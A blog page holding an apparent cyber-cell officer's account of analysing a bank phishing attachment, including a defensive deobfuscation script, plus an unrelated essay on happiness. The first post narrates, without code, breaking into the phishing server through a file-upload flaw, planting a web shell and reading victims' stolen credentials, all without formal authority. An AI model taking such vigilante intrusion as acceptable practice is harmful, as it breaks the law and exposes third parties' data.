August 9, 2017

Phishing in a well

I received an official mail asking me to confirm whether a mail they had received was legitimate or something suspicious.
The e-mail had a reply-to address of

The domain is a genuine domain registered by ING Vysya Bank but is not active.

Now, I had to check if the e-mail ID really exists.

Without further ado, I started looking into the mail, and it also had an attachment.

I downloaded the attachment (an HTML file) and opened it in the web browser. It was a (fake) login page of ING Vysya Bank with a form asking for user credentials. I wanted to know where the data would be submitted when a user clicks on the 'Submit' button, so I entered random details and clicked on the 'Submit' button. I could see in the status bar of my browser that the data was going to some IP and then it was redirecting us to the genuine website of ING Vysya Bank.

So far so good. I just wanted to check if the page was working as it was meant to.

Next step was to see the source code of the html page to find where exactly the data was going on the click of the 'Submit' button.

The source code was obfuscated using the encodeURI() function of JavaScript and was being decoded at run-time. The source code was Greek to me because of the obfuscation. I had to somehow decode the content to view the source code in clear text. I came to know about the decodeURI() function, which was the need of the hour. I used this technique to decode the source code into clear text. The data was double-encoded, so I had to double-decode the content using the unescape() or decodeURI() function to get the clear text, which I finally got after some time.

Now I knew what exactly I needed to look for in the source code. It was the "<form action>" tag, which along with the request method of "POST" would submit the data to some host.

It was some "".
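The double-decoding and form-action lookup described above can also be done statically, without rendering the attachment in a browser. This is an added example, not code from the original investigation: it uses decodeURIComponent (a superset of the decodeURI() mentioned in the post), and the sample attachment and the host collector.example.invalid are constructed placeholders.

```javascript
// Decode one layer; fall back to byte-wise decoding (like legacy unescape())
// when decodeURIComponent rejects malformed UTF-8 or %uXXXX sequences.
function decodeLayer(s) {
  try {
    return decodeURIComponent(s);
  } catch (e) {
    const chr = (_, h) => String.fromCharCode(parseInt(h, 16));
    return s.replace(/%u([0-9a-f]{4})/gi, chr).replace(/%([0-9a-f]{2})/gi, chr);
  }
}

// Peel layers until no escapes remain; the cap bounds work on crafted input.
function peel(s, maxLayers = 5) {
  let layers = 0;
  while (layers < maxLayers && /%(?:u[0-9a-f]{4}|[0-9a-f]{2})/i.test(s)) {
    const next = decodeLayer(s);
    if (next === s) break;
    s = next;
    layers += 1;
  }
  return { text: s, layers };
}

// Read action/method out of every <form> tag in already-decoded markup.
function formsIn(markup, layers) {
  const attr = (tag, name) =>
    (new RegExp(name + "\\s*=\\s*[\"']?([^\"'\\s>]+)", "i").exec(tag) || [])[1] || null;
  return (markup.match(/<form\b[^>]*>/gi) || []).map((tag) => ({
    action: attr(tag, "action"),
    method: (attr(tag, "method") || "GET").toUpperCase(),
    layers,
  }));
}

// Scan the raw file plus every quoted literal that contains percent escapes.
function findFormTargets(html) {
  const found = formsIn(html, 0);
  for (const m of html.matchAll(/(["'])([^"'\\]*%[0-9a-f]{2}[^"'\\]*)\1/gi)) {
    const { text, layers } = peel(m[2]);
    found.push(...formsIn(text, layers));
  }
  return found;
}

// Constructed sample (placeholder host), double-encoded the way the post describes.
const inner = '<form action="http://collector.example.invalid/is_vector.php" method="POST"><input name="user"></form>';
const SAMPLE = "<script>document.write(unescape(unescape('" +
  encodeURI(encodeURI(inner)) + "')));</script>";
console.log(findFormTargets(SAMPLE));
```

The `layers` field reports how many decoding passes were needed before the form tag became visible, which is 2 for a double-encoded attachment like the one in this case.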

Great! Now we know where our data is going to.
By the way, you already know that we cannot view the (actual) source code of a php file right?
It pre-processes before displaying the page. So, we can view only the code of the displayed page, but not the code which created the output.

So, now our aim was to see the code of this file "is_vector.php". I did some directory traversals, to browse through various directories, and found a "file upload" vulnerability in some page there, and that's where I fired my favorite madspot shell, and we had access to all the files on that directory and all other sub-directories.

It took some time to find out which directory had that juicy information relevant to this case.
Okay, but first I was interested in identifying the last accessed IP from the access logs, and it was
A quick WHOIS lookup gave the information that the IP belongs to Nigeria. (It could be a proxy or might be used for RDP but anyway that's not what we want to find out, at least in this case)

Now moving to view the actual source code of the php file "is_vector.php", I traversed through the path to reach the file, viewed the source code, and found that the data was being mailed to three IDs namely . , and

To know the potential victims of this attack, I would have to hack (get) into the above accounts and check their inboxes for the details they have received.

Luckily, I believe somebody was insecure amongst them and had also added a code in the end of that php file which would also append the data into a text file in some directory there, along with sending the data via their mailer to the above mail IDs.

The mailer was found to be configured by some Heru Kusnadi ( who might be the main person behind this, or could just be another partner in crime.

Uhm, anyways after deep-walking into those dozens of directories, finally I got the data related to the dump of credentials already submitted by some potential victims.

As I was not concerned directly with the victims outside India, I was looking for some data related to Indians. I could find a dozen valid responses (proper credentials) and luckily they had fortunately or unfortunately filled in their genuine mobile numbers too. It was easier for the team to contact and inform them to change their credentials (ATM PIN, transaction password, email password, etc).

By the grace of Almighty, there was no loss to any of our potential victims and they had changed their credentials. They thanked us for the timely help and some of them also burst into tears, but this was out of happiness as some victims had recently transferred their entire savings into this one account of theirs.

What did I get in return? Happiness in their voices, and a feeling of content both individually and also towards the Department which they now trust.
Well, that is more than enough! :)
There was no official complaint as-such but sometimes we take the action like 'Minority Report' ;)

Anyway, if you feel anything suspicious (as in mails, lottery SMSes, etc) kindly report it to your local Cyber Cells via mails at least or dial 1930 and/or report at

The complete documentation including the "Technical Process" can be provided if you want to study the details. Shoot me a mail.

See you soon.

Greetz to The CliQue - Guy244, GSM50, SajjutXt, KANK, F-roZ, i-maD

The Logical Kid

Disclaimer: Specifically added the mail IDs of the suspects in a searchable method so that it can be indexed on Google when you doubt their mails and search for their e-mail IDs. I hope this post gets displayed in the search results.

August 1, 2017

Happiness - within and around (extended)

Hello! Long time no see right? Hehe, was busy in a couple of tours around the Indian Sub-continent. :D

Well, this post is non-technical and more of a philosophical sort-of, as I have been traveling a lot..and maybe that is when you keep thinking about such stuffs when you gaze over the open skies! :D
This post is neither intended for brainwashing you, nor dominating your mind with my thoughts.
It is just my sole experience, and I hope that you may agree with all or at least some of my thoughts here.
        Sometimes you feel that being rich is the only way of being happy, and for that you work all your life to earn that MONEY which you apparently think that you need it, to be happy.
Don't you think you get many moments of happiness during this journey of yours of getting rich ?
Uhm, let me create a scenario according to your logic of staying happy(ier,iest)

    Assume that you want to buy your dream car and that costs around 30 lakhs (Hey.. let's be practical here, and let's ignore your unrealistic range of car worth crores, in this scenario).
So now, you have 30 lakhs, and you are good to go with your dream car.
Next what ?
You still would have dilemmatic thoughts as to buy the car with all the 30 lakhs you have, or settle for something of lesser cost and save the remaining money!

    If you go reluctantly for the 1st choice and go for buying the car with all the money you have, what about the cost to be incurred on the car again ? Fuel, servicing, oh yea.. a good garage for the car ?
Now you start thinking about switching to 'ALL Brand' level, meaning "Everything of a HIGH market value, or standard" and you crave for a good audio system in the car, renovating your place to match the standard of your car.
The point is, you are NOT enjoying the presence of your car and thinking about the other things now.
You are even planning to arrange for a good garage for your car, the audio system, racing decals, and what not!
    Let's assume that you had your car all set-up with the latest audio system and all those seem-to-be-good stuff somehow by your salary, etc.. will you be happy now ?
If you think that you will be happy, it's great! Sadly reality is not that way. You will crave for a better car sooner or later.. but for sure.
Statistically, you will be happy for a month, or a couple of them.. and get USED to the comfort and will seek better comfort or a HIGHER standard.
This is a continual process and this keeps on repeating until and unless your desires are controlled.

    Here comes an incident of my life, wherein I realised another fact about happiness.
This happened when I was in my 4th standard.
My parents had come to my school to take some documents pertaining to application of my Passport, and it was all BROADCASTED in my class by my class teacher that I was going to Saudi Arabia and my passport application is being filed.
Everybody was 'all smiles' in my class and suddenly I felt being RICH! It was unexpected for me who never left Hyderabad until then and now was going out of country. :D
        This doesn't end here. Everybody at home also made me feel the same, and I was really very happy and tried behaving in the best manner (something of that sort) and all that drama.
        I don't remember when this thought of me going to Saudi Arabia disappeared from my mind until my 9th class when actually I went to Saudi Arabia for the first time.
What does this mean now ? I hadn't been to Saudi in my 4th standard itself but the thought itself made me happy, and I already felt as-if I was there.
       A survey also says that people are lot more happier in planning their vacation than going on the vacation itself.
The above survey makes my point stronger now, ain't it ? ;)

    Uhm, I just remembered an incident in my life, which I consider an important event in my life.
I was in my 9th standard and had gone to Saudi Arabia for a vacation.
In earlier days there, I used to go shopping with my papa and was limited to buying few items (yea.. because my frequency of shopping was more :P). 
I used to grab all that was wanted by me. :P

    Then came a day when my papa told me,"Take WHATEVER you want today!"
What next ? Theoretically if anyone tells you so.. you never waste this chance and bump into all nooks and corners of the mall and grab everything you ever wanted to buy.. but on contrary I was PUZZLED as to WHAT I NEED and WHAT TO BUY, as I had freedom to buy everything I wanted that day.
    No! I wasn't getting emotional, nor did I even think of the prices, no.. nothing! I was a 14 year old kid and was as every other kid who craves for toys and all that fancy shopping!
Then came the enlightenment! I realised that only the words of my papa which literally meant that he can buy ANYTHING for me were more than enough for me.. and equivalent to that ANYTHING.
    Since that day I had a change of my mind and realised that happiness is NOT in BUYING things, it is basically in thinking that YOU can buy it.

    Now, let's assume a different scenario, directly related to MONEY.
During my years of Graduation, my group CliQue had planned for a party at the end of Graduation and we thought of contribution of 5000 Indian Rupees from each one in the group, that would be 35k in total and planned to spend it lavishly at the Taj Hotel.
We would receive scholarship from Government, and so thought we will start saving that for the party.
After completion of our Graduation, though we had a lot more than the planned money, we were satisfied with having "paratha with aaloo" in a local restaurant and tea, roughly amounting to 500 Rupees max.

Let me imagine what would happen if someone would really think of spending all that 35k.
I bet they wouldn't, well at least according to me who had lived that moment.

Let's consider you really feel that you WILL spend that money no-matter what, and without any second thoughts..
Okay! You spent all that without second thought.. had gala time for an hour, a couple of hours, or say 1 day..!
    Obviously! You would have enjoyed a lot and yeah.. it would have obviously made you HAPPY too.. but what were the elements of happiness basically there ? Your money?

Obviously NO! If money would make you happy, you wouldn't spend them at all! :)
    You were happy because you probably weren't ALONE. You were sharing the enjoyable moments with the people you LIKE, LOVE, or CARE.
So basically YOUR happiness was NOT by your money, but by the HAPPINESS of the people you were with.
    So, the gist of this post is that real happiness is in happiness of the people who matter to you.
Keep spreading happiness, you will never regret this! :)
Hope this post did leave some impact on you!

I firmly believe that what can be bought, can be eventually bought. After all, it requires only money which can be earned someday. Don't worry about that. Worry about the things which cannot be 'bought'.

Having said that, time for me to wrap it up.

Thanks for reading. Take care! :)
